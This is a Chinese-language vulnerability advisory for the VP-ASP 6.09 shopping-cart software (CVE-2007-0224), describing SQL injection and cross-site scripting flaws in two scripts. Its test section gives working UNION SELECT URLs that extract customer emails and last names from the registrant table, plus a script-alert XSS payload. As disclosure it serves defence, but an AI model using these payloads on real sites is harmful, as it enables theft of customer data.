发布日期：2007-01-11
更新日期：2007-01-11

受影响系统：

Virtual Programming VP-ASP 6.09

描述：

---

BUGTRAQ  ID: 22018
CVE(CAN) ID: CVE-2007-0224

Virtual Programming VP-ASP是一款商业性质的电子购物应用系统，由ASP脚本编写。

Virtual Programming VP-ASP的处理用户请求时存在输入验证漏洞，远程攻击者可以利用这个漏洞获得敏感信息或非授权操作数据库。

VP-ASP的shopgiftregsearch.asp和shopcustadmin.asp脚本没有对用户提交的LoginLastname和msg参数数据做充分的检查过滤，攻击者可以通过插入特定的SQL语名或脚本代码，可能获得其他用户浏览器相关的敏感信息，也可对数据库进行更改。

<*来源：ajann
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

建议：

---

厂商补丁：

Virtual Programming
-------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vpasp.com/

浏览次数：2743
严重程度：0（网友投票）